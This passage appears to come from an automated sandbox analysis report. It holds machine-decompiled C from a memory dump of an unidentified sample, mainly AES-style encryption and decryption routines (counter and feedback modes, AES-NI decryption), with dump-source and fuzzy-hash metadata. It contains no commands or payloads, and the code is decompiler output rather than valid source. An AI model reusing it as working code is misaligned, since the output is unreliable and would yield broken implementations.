                                                              				E00C6BB10(4);
                                                              				_t151 =  *( *(_t168 + 0x1c));
                                                              				_t146 =  *((intOrPtr*)(_t168 + 0x28));
                                                              				if( *(_t168 + 0x20) == 0) {
                                                              					_t159 =  *(_t168 + 0x20);
                                                              					_t101 =  *(_t168 + 0x18);
                                                              					if(_t151 != 0) {
                                                              						while(_t159 != 0) {
                                                              							_t87 =  *_t101;
                                                              							_t115 =  *(_t168 + 0x1c);
                                                              							 *_t115 =  *(_t151 + _t146) ^ _t87;
                                                              							 *(_t151 + _t146) = _t87;
                                                              							_t101 =  &(_t101[0]);
                                                              							_t159 = _t159 - 1;
                                                              							_t151 = _t151 + 0x00000001 & 0x0000000f;
                                                              							 *(_t168 + 0x1c) =  &(_t115[1]);
                                                              							if(_t151 != 0) {
                                                              								continue;
                                                              							}
                                                              							break;
                                                              						}
                                                              						 *(_t168 + 0x18) = _t101;
                                                              						 *(_t168 + 0x20) = _t159;
                                                              					}
                                                              					if(_t159 >= 0x10) {
                                                              						 *((intOrPtr*)(_t168 + 0x30)) =  *(_t168 + 0x1c) - _t146;
                                                              						 *(_t168 + 0x10) = _t159 >> 4;
                                                              						do {
                                                              							 *((intOrPtr*)(_t168 + 0x40))(_t146, _t146,  *((intOrPtr*)(_t168 + 0x24)));
                                                              							_t168 = _t168 + 0xc;
                                                              							if(_t151 < 0x10) {
                                                              								_t104 = _t101 -  *(_t168 + 0x1c);
                                                              								_t86 = _t151 + _t146;
                                                              								_t114 = (0xf - _t151 >> 2) + 1;
                                                              								do {
                                                              									_t132 =  *((intOrPtr*)(_t168 + 0x30)) + _t86;
                                                              									_t153 =  *(_t132 + _t104);
                                                              									 *_t132 =  *_t86 ^ _t153;
                                                              									 *_t86 = _t153;
                                                              									_t86 =  &(_t86[1]);
                                                              									_t114 = _t114 - 1;
                                                              								} while (_t114 != 0);
                                                              								_t159 =  *(_t168 + 0x20);
                                                              								_t101 =  *(_t168 + 0x18);
                                                              							}
                                                              							 *(_t168 + 0x1c) =  &(( *(_t168 + 0x1c))[0x10]);
                                                              							 *((intOrPtr*)(_t168 + 0x30)) =  *((intOrPtr*)(_t168 + 0x30)) + 0x10;
                                                              							_t159 = _t159 - 0x10;
                                                              							_t101 =  &(_t101[4]);
                                                              							_t151 = 0;
                                                              							_t59 = _t168 + 0x10;
                                                              							 *_t59 =  *(_t168 + 0x10) - 1;
                                                              							 *(_t168 + 0x20) = _t159;
                                                              							 *(_t168 + 0x18) = _t101;
                                                              						} while ( *_t59 != 0);
                                                              					}
                                                              					if(_t159 != 0) {
                                                              						 *((intOrPtr*)(_t168 + 0x40))(_t146, _t146,  *((intOrPtr*)(_t168 + 0x24)));
                                                              						_t108 =  *((intOrPtr*)(_t168 + 0x28));
                                                              						_t103 = _t101 - _t108;
                                                              						_t109 = _t108 - _t146;
                                                              						_t168 = _t168 + 0xc;
                                                              						_t78 = _t151 + _t146;
                                                              						 *((intOrPtr*)(_t168 + 0x30)) = _t109;
                                                              						_t151 = _t151 + _t159;
                                                              						while(1) {
                                                              							_t148 = _t78 + _t109;
                                                              							_t110 = _t148[_t103];
                                                              							 *_t148 =  *_t78 ^ _t110;
                                                              							_t159 = _t159 - 1;
                                                              							 *_t78 = _t110;
                                                              							_t78 =  &(_t78[0]);
                                                              							if(_t159 == 0) {
                                                              								goto L31;
                                                              							}
                                                              							_t109 =  *((intOrPtr*)(_t168 + 0x30));
                                                              						}
                                                              					}
                                                              					goto L31;
                                                              				} else {
                                                              					_t105 =  *(_t168 + 0x20);
                                                              					if(_t151 != 0) {
                                                              						while(_t105 != 0) {
                                                              							_t143 =  *(_t168 + 0x18);
                                                              							 *(_t151 + _t146) =  *(_t151 + _t146) ^  *_t143;
                                                              							_t127 =  *(_t168 + 0x1c);
                                                              							 *_t127 =  *(_t151 + _t146);
                                                              							_t105 = _t105 - 1;
                                                              							_t151 = _t151 + 0x00000001 & 0x0000000f;
                                                              							 *(_t168 + 0x1c) =  &(_t127[1]);
                                                              							 *(_t168 + 0x18) =  &(_t143[0]);
                                                              							if(_t151 != 0) {
                                                              								continue;
                                                              							}
                                                              							goto L5;
                                                              						}
                                                              					}
                                                              					L5:
                                                              					if(_t105 >= 0x10) {
                                                              						_t137 =  *(_t168 + 0x18);
                                                              						_t120 =  *(_t168 + 0x1c);
                                                              						 *((intOrPtr*)(_t168 + 0x30)) = _t137 - _t146;
                                                              						_t95 = _t105 >> 4;
                                                              						 *(_t168 + 0x10) = _t95;
                                                              						_t96 = _t95 << 4;
                                                              						_t167 = _t120 - _t146;
                                                              						 *(_t168 + 0x1c) =  &(_t120[_t96]);
                                                              						 *(_t168 + 0x18) = _t137 + _t96;
                                                              						do {
                                                              							 *((intOrPtr*)(_t168 + 0x40))(_t146, _t146,  *((intOrPtr*)(_t168 + 0x24)));
                                                              							_t168 = _t168 + 0xc;
                                                              							if(_t151 < 0x10) {
                                                              								_t98 = _t151 + _t146;
                                                              								_t125 = (0xf - _t151 >> 2) + 1;
                                                              								do {
                                                              									 *_t98 =  *_t98 ^  *( *((intOrPtr*)(_t168 + 0x30)) + _t98);
                                                              									 *(_t98 + _t167) =  *_t98;
                                                              									_t98 =  &(_t98[1]);
                                                              									_t125 = _t125 - 1;
                                                              								} while (_t125 != 0);
                                                              							}
                                                              							 *((intOrPtr*)(_t168 + 0x30)) =  *((intOrPtr*)(_t168 + 0x30)) + 0x10;
                                                              							_t105 = _t105 - 0x10;
                                                              							_t167 = _t167 + 0x10;
                                                              							_t151 = 0;
                                                              							_t26 = _t168 + 0x10;
                                                              							 *_t26 =  *(_t168 + 0x10) - 1;
                                                              						} while ( *_t26 != 0);
                                                              					}
                                                              					if(_t105 == 0) {
                                                              						L31:
                                                              						_t75 =  *(_t168 + 0x2c);
                                                              						 *_t75 = _t151;
                                                              						return _t75;
                                                              					} else {
                                                              						 *((intOrPtr*)(_t168 + 0x40))(_t146, _t146,  *((intOrPtr*)(_t168 + 0x24)));
                                                              						_t169 = _t168 + 0xc;
                                                              						_t90 = _t151 + _t146;
                                                              						_t164 =  *((intOrPtr*)(_t168 + 0x24)) - _t146;
                                                              						_t118 =  *((intOrPtr*)(_t168 + 0x28)) - _t146;
                                                              						_t155 = _t151 + _t105;
                                                              						do {
                                                              							 *_t90 =  *_t90 ^  *(_t90 + _t164) & 0x000000ff;
                                                              							_t105 = _t105 - 1;
                                                              							 *((char*)(_t90 + _t118)) =  *_t90;
                                                              							_t90 =  &(_t90[0]);
                                                              						} while (_t105 != 0);
                                                              						_t91 =  *((intOrPtr*)(_t169 + 0x2c));
                                                              						 *_t91 = _t155;
                                                              						return _t91;
                                                              					}
                                                              				}
                                                              			}


                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • Opcode ID: b6ca65db41aeb67edb8e654b06e533f59a24df482418cc9813ac49f26b87c0ac
                                                              • Instruction ID: 7d5e0c07653c48bfd9e02fa4f07af3125cb6cb90d153bc401ae0e140b2690078
                                                              • Opcode Fuzzy Hash: b6ca65db41aeb67edb8e654b06e533f59a24df482418cc9813ac49f26b87c0ac
                                                              • Instruction Fuzzy Hash: EB7136715083868FD714DF28848496BBBE4EFDA318F050AADE9C687356D770E905CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 77%
                                                              			E00B9BFD0(void* __ebx, void* __edi) {
                                                              				signed int _t121;
                                                              				signed char _t125;
                                                              				signed char _t147;
                                                              				void* _t150;
                                                              				signed int* _t151;
                                                              				void* _t153;
                                                              				intOrPtr _t156;
                                                              				signed char* _t157;
                                                              				unsigned int _t159;
                                                              				signed int _t167;
                                                              				signed int _t170;
                                                              				intOrPtr* _t172;
                                                              				unsigned int _t173;
                                                              				signed char* _t175;
                                                              				signed int _t180;
                                                              				void* _t188;
                                                              				signed char* _t189;
                                                              				unsigned int _t192;
                                                              				unsigned int _t193;
                                                              				intOrPtr _t195;
                                                              				void* _t198;
                                                              
                                                              				_t188 = __edi;
                                                              				_t150 = __ebx;
                                                              				E00C6BB10(0x14);
                                                              				_t193 =  *(_t198 + 0x1c);
                                                              				_t172 =  *((intOrPtr*)(_t193 + 0x160));
                                                              				 *((intOrPtr*)(_t198 + 8)) =  *((intOrPtr*)(_t193 + 0x170));
                                                              				 *((intOrPtr*)(_t198 + 4)) =  *((intOrPtr*)(_t193 + 0x174));
                                                              				 *((intOrPtr*)(_t198 + 0x14)) =  *((intOrPtr*)(_t193 + 0x164));
                                                              				_t156 =  *(_t198 + 0x28) +  *((intOrPtr*)(_t193 + 0x38));
                                                              				 *((intOrPtr*)(_t198 + 0x10)) = _t172;
                                                              				asm("adc eax, [esi+0x3c]");
                                                              				if(0 > 0xf || 0 >= 0xf && _t156 > 0xffffffe0) {
                                                              					return 0xffffffff;
                                                              				} else {
                                                              					 *((intOrPtr*)(_t193 + 0x38)) = _t156;
                                                              					 *((intOrPtr*)(_t193 + 0x3c)) = 0;
                                                              					if( *((intOrPtr*)(_t193 + 0x16c)) != 0) {
                                                              						 *_t172(_t193 + 0x40, _t193 + 0x60);
                                                              						_t198 = _t198 + 8;
                                                              						 *((intOrPtr*)(_t193 + 0x16c)) = 0;
                                                              					}
                                                              					_t157 =  *(_t193 + 0x168);
                                                              					_push(_t150);
                                                              					_t151 =  *(_t198 + 0x24);
                                                              					_t195 =  *((intOrPtr*)(_t193 + 0xc));
                                                              					_push(_t188);
                                                              					_t189 =  *(_t198 + 0x30);
                                                              					asm("bswap ebp");
                                                              					 *(_t198 + 0x28) = _t157;
                                                              					if(_t157 == 0) {
                                                              						L13:
                                                              						_t173 =  *(_t198 + 0x34);
                                                              						if(_t173 >= 0xc00) {
                                                              							 *(_t198 + 0x1c) = 0xaaaaaaab * _t173 >> 0x20 >> 0xb;
                                                              							do {
                                                              								 *(_t198 + 0x18) = 0xc0;
                                                              								do {
                                                              									 *((intOrPtr*)(_t198 + 0x20))(_t193, _t193 + 0x10,  *((intOrPtr*)(_t198 + 0x10)));
                                                              									_t195 = _t195 + 1;
                                                              									asm("bswap ecx");
                                                              									 *((intOrPtr*)(_t193 + 0xc)) = _t195;
                                                              									_t198 = _t198 + 0xc;
                                                              									 *_t189 =  *(_t193 + 0x10) ^  *_t151;
                                                              									_t189 =  &(_t189[0x10]);
                                                              									 *(_t189 - 0xc) = _t151[1] ^  *(_t193 + 0x14);
                                                              									_t167 = _t151[2] ^  *(_t193 + 0x18);
                                                              									_t151 =  &(_t151[4]);
                                                              									 *(_t189 - 8) = _t167;
                                                              									_t58 = _t198 + 0x18;
                                                              									 *_t58 =  *(_t198 + 0x18) - 1;
                                                              									 *(_t189 - 4) =  *(_t151 - 4) ^  *(_t193 + 0x1c);
                                                              								} while ( *_t58 != 0);
                                                              								 *(_t198 + 0x30)(_t193 + 0x40, _t193 + 0x60, _t189 - 0xc00, 0xc00);
                                                              								 *(_t198 + 0x44) =  *(_t198 + 0x44) - 0xc00;
                                                              								_t198 = _t198 + 0x10;
                                                              								_t67 = _t198 + 0x1c;
                                                              								 *_t67 =  *(_t198 + 0x1c) - 1;
                                                              							} while ( *_t67 != 0);
                                                              							_t157 =  *(_t198 + 0x28);
                                                              							_t173 =  *(_t198 + 0x34);
                                                              						}
                                                              						_t121 = _t173 & 0xfffffff0;
                                                              						 *(_t198 + 0x18) = _t121;
                                                              						if(_t121 != 0) {
                                                              							if(_t173 >= 0x10) {
                                                              								 *(_t198 + 0x1c) = _t173 >> 4;
                                                              								do {
                                                              									 *((intOrPtr*)(_t198 + 0x20))(_t193, _t193 + 0x10,  *((intOrPtr*)(_t198 + 0x10)));
                                                              									_t195 = _t195 + 1;
                                                              									 *((intOrPtr*)(_t198 + 0x40)) =  *((intOrPtr*)(_t198 + 0x40)) - 0x10;
                                                              									asm("bswap edx");
                                                              									 *((intOrPtr*)(_t193 + 0xc)) = _t195;
                                                              									_t198 = _t198 + 0xc;
                                                              									 *_t189 =  *(_t193 + 0x10) ^  *_t151;
                                                              									_t189 =  &(_t189[0x10]);
                                                              									 *(_t189 - 0xc) = _t151[1] ^  *(_t193 + 0x14);
                                                              									_t180 = _t151[2] ^  *(_t193 + 0x18);
                                                              									_t151 =  &(_t151[4]);
                                                              									 *(_t189 - 8) = _t180;
                                                              									_t88 = _t198 + 0x1c;
                                                              									 *_t88 =  *(_t198 + 0x1c) - 1;
                                                              									 *(_t189 - 4) =  *(_t151 - 4) ^  *(_t193 + 0x1c);
                                                              								} while ( *_t88 != 0);
                                                              								_t121 =  *(_t198 + 0x18);
                                                              							}
                                                              							 *(_t198 + 0x30)(_t193 + 0x40, _t193 + 0x60, _t189 - _t121, _t121);
                                                              							_t157 =  *(_t198 + 0x38);
                                                              							_t173 =  *(_t198 + 0x44);
                                                              							_t198 = _t198 + 0x10;
                                                              						}
                                                              						if(_t173 != 0) {
                                                              							 *((intOrPtr*)(_t198 + 0x20))(_t193, _t193 + 0x10,  *((intOrPtr*)(_t198 + 0x10)));
                                                              							_t159 =  *(_t198 + 0x34);
                                                              							asm("bswap ebp");
                                                              							_t198 = _t198 + 0xc;
                                                              							 *((intOrPtr*)(_t193 + 0xc)) = _t195 + 1;
                                                              							_t175 =  &(_t189[_t159]);
                                                              							_t153 = _t151 - _t189;
                                                              							do {
                                                              								_t125 =  *(_t193 + _t159 + 0x10) ^  *(_t153 + _t175);
                                                              								 *_t175 = _t125;
                                                              								 *(_t193 + _t159 + 0x40) =  *(_t193 + _t159 + 0x40) ^ _t125;
                                                              								_t192 =  *(_t198 + 0x34) - 1;
                                                              								_t159 = _t159 + 1;
                                                              								_t175 =  &(_t175[1]);
                                                              								 *(_t198 + 0x34) = _t192;
                                                              							} while (_t192 != 0);
                                                              							 *(_t198 + 0x28) = _t159;
                                                              						}
                                                              					} else {
                                                              						while( *(_t198 + 0x34) != 0) {
                                                              							_t147 = _t157[_t193 + 0x10] ^  *_t151;
                                                              							 *(_t198 + 0x34) =  *(_t198 + 0x34) - 1;
                                                              							 *_t189 = _t147;
                                                              							_t157[_t193 + 0x40] = _t157[_t193 + 0x40] ^ _t147;
                                                              							_t189 =  &(_t189[1]);
                                                              							_t151 =  &(_t151[0]);
                                                              							_t170 =  &(_t157[1]) & 0x0000000f;
                                                              							 *(_t198 + 0x28) = _t170;
                                                              							if(_t170 != 0) {
                                                              								_t157 =  *(_t198 + 0x28);
                                                              								continue;
                                                              							} else {
                                                              								L12:
                                                              								 *(_t198 + 0x24)(_t193 + 0x40, _t193 + 0x60);
                                                              								_t157 =  *(_t198 + 0x30);
                                                              								_t198 = _t198 + 8;
                                                              								goto L13;
                                                              							}
                                                              							goto L29;
                                                              						}
                                                              						if(_t157 == 0) {
                                                              							goto L12;
                                                              						}
                                                              					}
                                                              					L29:
                                                              					 *(_t193 + 0x168) = _t157;
                                                              					return 0;
                                                              				}
                                                              			}

























                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2c4eef3606d849489a46c8cf01e13a301d6c5479e345453bf65955e78e7400ab
                                                              • Instruction ID: 6726f1fc7268f31252fa8fa6abfef276dad9ccfd674b9a1276e8b3f0f0a81337
                                                              • Opcode Fuzzy Hash: 2c4eef3606d849489a46c8cf01e13a301d6c5479e345453bf65955e78e7400ab
                                                              • Instruction Fuzzy Hash: 2B8136715087018FC728CF69C884AABBBF5FF89304F588A6DE49A8B641D731E905CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 76%
                                                              			E00B9C240(void* __ebx, void* __edi) {
                                                              				signed int _t119;
                                                              				unsigned int _t122;
                                                              				signed int _t142;
                                                              				signed int _t146;
                                                              				void* _t149;
                                                              				signed char* _t150;
                                                              				intOrPtr _t156;
                                                              				signed int _t157;
                                                              				signed int _t159;
                                                              				signed char _t161;
                                                              				signed char _t170;
                                                              				intOrPtr* _t172;
                                                              				unsigned int _t175;
                                                              				signed int _t179;
                                                              				void* _t187;
                                                              				signed int* _t188;
                                                              				void* _t190;
                                                              				unsigned int _t191;
                                                              				intOrPtr _t193;
                                                              				signed char* _t196;
                                                              				void* _t197;
                                                              				void* _t200;
                                                              
                                                              				_t187 = __edi;
                                                              				_t149 = __ebx;
                                                              				E00C6BB10(0x14);
                                                              				_t191 =  *(_t197 + 0x1c);
                                                              				_t172 =  *((intOrPtr*)(_t191 + 0x160));
                                                              				 *((intOrPtr*)(_t197 + 8)) =  *((intOrPtr*)(_t191 + 0x170));
                                                              				 *((intOrPtr*)(_t197 + 4)) =  *((intOrPtr*)(_t191 + 0x174));
                                                              				 *((intOrPtr*)(_t197 + 0x14)) =  *((intOrPtr*)(_t191 + 0x164));
                                                              				_t156 =  *(_t197 + 0x28) +  *((intOrPtr*)(_t191 + 0x38));
                                                              				 *((intOrPtr*)(_t197 + 0x10)) = _t172;
                                                              				asm("adc eax, [esi+0x3c]");
                                                              				if(0 > 0xf || 0 >= 0xf && _t156 > 0xffffffe0) {
                                                              					return 0xffffffff;
                                                              				} else {
                                                              					 *((intOrPtr*)(_t191 + 0x38)) = _t156;
                                                              					 *((intOrPtr*)(_t191 + 0x3c)) = 0;
                                                              					if( *((intOrPtr*)(_t191 + 0x16c)) != 0) {
                                                              						 *_t172(_t191 + 0x40, _t191 + 0x60);
                                                              						_t197 = _t197 + 8;
                                                              						 *((intOrPtr*)(_t191 + 0x16c)) = 0;
                                                              					}
                                                              					_t119 =  *(_t191 + 0x168);
                                                              					_push(_t149);
                                                              					_t150 =  *(_t197 + 0x28);
                                                              					_t193 =  *((intOrPtr*)(_t191 + 0xc));
                                                              					_push(_t187);
                                                              					_t188 =  *(_t197 + 0x2c);
                                                              					asm("bswap ebp");
                                                              					 *(_t197 + 0x28) = _t119;
                                                              					if(_t119 == 0) {
                                                              						L13:
                                                              						_t157 =  *(_t197 + 0x34);
                                                              						if(_t157 >= 0xc00) {
                                                              							 *(_t197 + 0x1c) = 0xaaaaaaab * _t157 >> 0x20 >> 0xb;
                                                              							do {
                                                              								 *(_t197 + 0x30)(_t191 + 0x40, _t191 + 0x60, _t188, 0xc00);
                                                              								_t200 = _t197 + 0x10;
                                                              								 *((intOrPtr*)(_t200 + 0x18)) = 0xc0;
                                                              								do {
                                                              									 *((intOrPtr*)(_t200 + 0x20))(_t191, _t191 + 0x10,  *((intOrPtr*)(_t200 + 0x10)));
                                                              									_t193 = _t193 + 1;
                                                              									asm("bswap eax");
                                                              									 *((intOrPtr*)(_t191 + 0xc)) = _t193;
                                                              									_t200 = _t200 + 0xc;
                                                              									 *_t150 =  *_t188 ^  *(_t191 + 0x10);
                                                              									_t150 =  &(_t150[0x10]);
                                                              									 *(_t150 - 0xc) = _t188[1] ^  *(_t191 + 0x14);
                                                              									_t142 = _t188[2] ^  *(_t191 + 0x18);
                                                              									_t188 =  &(_t188[4]);
                                                              									 *(_t150 - 8) = _t142;
                                                              									_t61 = _t200 + 0x18;
                                                              									 *_t61 =  *((intOrPtr*)(_t200 + 0x18)) - 1;
                                                              									 *(_t150 - 4) =  *(_t188 - 4) ^  *(_t191 + 0x1c);
                                                              								} while ( *_t61 != 0);
                                                              								 *((intOrPtr*)(_t200 + 0x34)) =  *((intOrPtr*)(_t200 + 0x34)) - 0xc00;
                                                              								_t66 = _t200 + 0x1c;
                                                              								 *_t66 =  *((intOrPtr*)(_t200 + 0x1c)) - 1;
                                                              							} while ( *_t66 != 0);
                                                              							_t119 =  *(_t200 + 0x28);
                                                              						}
                                                              						_t159 =  *(_t197 + 0x34) & 0xfffffff0;
                                                              						if(_t159 != 0) {
                                                              							 *(_t197 + 0x30)(_t191 + 0x40, _t191 + 0x60, _t188, _t159);
                                                              							_t197 = _t197 + 0x10;
                                                              							if( *(_t197 + 0x34) >= 0x10) {
                                                              								 *(_t197 + 0x20) =  *(_t197 + 0x34) >> 4;
                                                              								do {
                                                              									 *(_t197 + 0x20)(_t191, _t191 + 0x10,  *((intOrPtr*)(_t197 + 0x10)));
                                                              									_t193 = _t193 + 1;
                                                              									 *((intOrPtr*)(_t197 + 0x40)) =  *((intOrPtr*)(_t197 + 0x40)) - 0x10;
                                                              									asm("bswap edx");
                                                              									 *((intOrPtr*)(_t191 + 0xc)) = _t193;
                                                              									_t197 = _t197 + 0xc;
                                                              									 *_t150 =  *_t188 ^  *(_t191 + 0x10);
                                                              									_t150 =  &(_t150[0x10]);
                                                              									 *(_t150 - 0xc) = _t188[1] ^  *(_t191 + 0x14);
                                                              									_t179 = _t188[2] ^  *(_t191 + 0x18);
                                                              									_t188 =  &(_t188[4]);
                                                              									 *(_t150 - 8) = _t179;
                                                              									_t91 = _t197 + 0x20;
                                                              									 *_t91 =  *(_t197 + 0x20) - 1;
                                                              									 *(_t150 - 4) =  *(_t188 - 4) ^  *(_t191 + 0x1c);
                                                              								} while ( *_t91 != 0);
                                                              							}
                                                              							_t119 =  *(_t197 + 0x28);
                                                              						}
                                                              						if( *(_t197 + 0x34) != 0) {
                                                              							 *(_t197 + 0x20)(_t191, _t191 + 0x10,  *((intOrPtr*)(_t197 + 0x10)));
                                                              							_t122 =  *(_t197 + 0x34);
                                                              							asm("bswap ebp");
                                                              							_t197 = _t197 + 0xc;
                                                              							 *((intOrPtr*)(_t191 + 0xc)) = _t193 + 1;
                                                              							_t196 =  &(_t150[_t122]);
                                                              							_t190 = _t188 - _t150;
                                                              							do {
                                                              								_t161 =  *((intOrPtr*)(_t190 + _t196));
                                                              								 *(_t191 + _t122 + 0x40) =  *(_t191 + _t122 + 0x40) ^ _t161;
                                                              								_t175 =  *(_t197 + 0x34) - 1;
                                                              								 *_t196 =  *(_t191 + _t122 + 0x10) ^ _t161;
                                                              								_t122 = _t122 + 1;
                                                              								_t196 =  &(_t196[1]);
                                                              								 *(_t197 + 0x34) = _t175;
                                                              							} while (_t175 != 0);
                                                              							 *(_t197 + 0x28) = _t122;
                                                              						}
                                                              					} else {
                                                              						while( *(_t197 + 0x34) != 0) {
                                                              							_t170 =  *_t188;
                                                              							 *(_t197 + 0x34) =  *(_t197 + 0x34) - 1;
                                                              							 *_t150 =  *(_t191 + 0x10 + _t119) ^ _t170;
                                                              							 *(_t119 + _t191 + 0x40) =  *(_t119 + _t191 + 0x40) ^ _t170;
                                                              							_t188 =  &(_t188[0]);
                                                              							_t150 =  &(_t150[1]);
                                                              							_t146 = _t119 + 0x00000001 & 0x0000000f;
                                                              							 *(_t197 + 0x28) = _t146;
                                                              							if(_t146 != 0) {
                                                              								_t119 =  *(_t197 + 0x28);
                                                              								continue;
                                                              							} else {
                                                              								L12:
                                                              								 *((intOrPtr*)(_t197 + 0x24))(_t191 + 0x40, _t191 + 0x60);
                                                              								_t119 =  *(_t197 + 0x30);
                                                              								_t197 = _t197 + 8;
                                                              								goto L13;
                                                              							}
                                                              							goto L28;
                                                              						}
                                                              						if(_t119 == 0) {
                                                              							goto L12;
                                                              						}
                                                              					}
                                                              					L28:
                                                              					 *(_t191 + 0x168) = _t119;
                                                              					return 0;
                                                              				}
                                                              			}


























                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • Opcode ID: 3a6d284aeba771d297abd19d85f1e2230c4e8247e5081d0bd3926f657acb5ba2
                                                              • Instruction ID: 1a604e8d9de88c691e6a2454047654ded9eda037ae8bee8ffd1684af583e39b4
                                                              • Opcode Fuzzy Hash: 3a6d284aeba771d297abd19d85f1e2230c4e8247e5081d0bd3926f657acb5ba2
                                                              • Instruction Fuzzy Hash: FA8115715087009FD724CF29C984AABBBF4FF89304F948A6DE49A87641D730E949CB56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 30%
                                                              			E00B98CC0(intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20) {
                                                              				signed int _t20;
                                                              				signed int _t21;
                                                              				void* _t22;
                                                              				void* _t23;
                                                              				void* _t24;
                                                              				intOrPtr _t25;
                                                              				signed int _t26;
                                                              				signed int _t27;
                                                              				signed int _t28;
                                                              				intOrPtr _t29;
                                                              				void* _t30;
                                                              				void* _t31;
                                                              				intOrPtr _t32;
                                                              				intOrPtr _t35;
                                                              				void* _t36;
                                                              				void* _t37;
                                                              				intOrPtr _t38;
                                                              				intOrPtr _t39;
                                                              				void* _t45;
                                                              				void* _t46;
                                                              
                                                              				_t35 = _a4;
                                                              				_t32 = _a8;
                                                              				_t29 = _a16;
                                                              				_t25 = _a20;
                                                              				_t20 = _a12 & 0xfffffff0;
                                                              				if(_t20 == 0) {
                                                              					L34:
                                                              					asm("pxor xmm0, xmm0");
                                                              					asm("pxor xmm1, xmm1");
                                                              					asm("pxor xmm2, xmm2");
                                                              					asm("pxor xmm3, xmm3");
                                                              					asm("pxor xmm4, xmm4");
                                                              					asm("pxor xmm5, xmm5");
                                                              					asm("pxor xmm6, xmm6");
                                                              					asm("pxor xmm7, xmm7");
                                                              					return _t20;
                                                              				}
                                                              				_t28 =  *(_t29 + 0xf0);
                                                              				if(_t25 == 0) {
                                                              					_t38 = _t29;
                                                              					_t26 = _t28;
                                                              					__eflags = _t20 - 0x60;
                                                              					if(_t20 < 0x60) {
                                                              						L23:
                                                              						asm("movups xmm2, [esi]");
                                                              						__eflags = _t20 - 0x20;
                                                              						if(__eflags < 0) {
                                                              							asm("movups xmm0, [edx]");
                                                              							asm("movups xmm1, [edx+0x10]");
                                                              							_t30 = _t29 + 0x20;
                                                              							asm("xorps xmm2, xmm0");
                                                              							do {
                                                              								asm("aesdec xmm2, xmm1");
                                                              								_t28 = _t28 - 1;
                                                              								__eflags = _t28;
                                                              								asm("movups xmm1, [edx]");
                                                              								_t18 = _t30 + 0x10; // 0xcccccccc
                                                              								_t30 = _t18;
                                                              							} while (_t28 != 0);
                                                              							asm("aesdeclast xmm2, xmm1");
                                                              							asm("movups [edi], xmm2");
                                                              							goto L34;
                                                              						}
                                                              						asm("movups xmm3, [esi+0x10]");
                                                              						if(__eflags == 0) {
                                                              							_t20 = E00B98880(_t20, _t28, _t29);
                                                              							asm("movups [edi], xmm2");
                                                              							asm("movups [edi+0x10], xmm3");
                                                              						} else {
                                                              							asm("movups xmm4, [esi+0x20]");
                                                              							__eflags = _t20 - 0x40;
                                                              							if(__eflags < 0) {
                                                              								_t20 = E00B98960(_t20, _t28, _t29);
                                                              								asm("movups [edi], xmm2");
                                                              								asm("movups [edi+0x10], xmm3");
                                                              								asm("movups [edi+0x20], xmm4");
                                                              							} else {
                                                              								asm("movups xmm5, [esi+0x30]");
                                                              								if(__eflags == 0) {
                                                              									_t20 = E00B98A70(_t20, _t28, _t29);
                                                              									asm("movups [edi], xmm2");
                                                              									asm("movups [edi+0x10], xmm3");
                                                              									asm("movups [edi+0x20], xmm4");
                                                              									asm("movups [edi+0x30], xmm5");
                                                              								} else {
                                                              									asm("movups xmm6, [esi+0x40]");
